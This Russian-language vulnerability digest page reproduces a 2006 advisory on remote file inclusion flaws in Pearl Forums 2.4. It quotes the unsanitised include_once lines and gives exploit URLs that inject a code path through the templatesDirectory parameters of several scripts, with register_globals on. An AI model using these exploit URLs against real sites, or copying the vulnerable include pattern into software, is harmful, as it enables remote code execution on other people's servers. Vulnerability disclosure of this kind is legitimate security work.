Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

phpPC 1.04 Multiples Remote File Inclusion

PhotoCart 3.9 (adminprint. php) Remote File Include Vulnerability

Vulnerability in PostNuke

Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

From:	Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:	22 ноября 2006 г.
Subject:	Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////
////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main  Script Of Pearl Products
//Affected Version:2.4
//D
script:
http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=swi
tch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////
////////////////////////////
//-------------------------------------------------------------------------------
---

Bug in
 adressbook.php & admin.php & merge.php &
more than
u expected files r vulnerable just try to check all files
Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------
\\

-------------------------------------------------------------------------------
Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.
php");
include_once("$templatesDirectory/admin.php");

---------------------------------------------------------------------------------
--
Exploits:
~~~~~~~~~
Note that more variables are not sanitized so Exploits can work
Successfuly when
register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.
php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.
php?GlobalSettings[templatesDirectory]=evill
code

   And Many Bug u can discovered just download the script

---------------------------------------------------------------------------------
--
   Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
   Special Gr33Ts:ASIANEAGLE & Kacper & The Master

/////////////////////////////////////////////////////////////////////////////////
///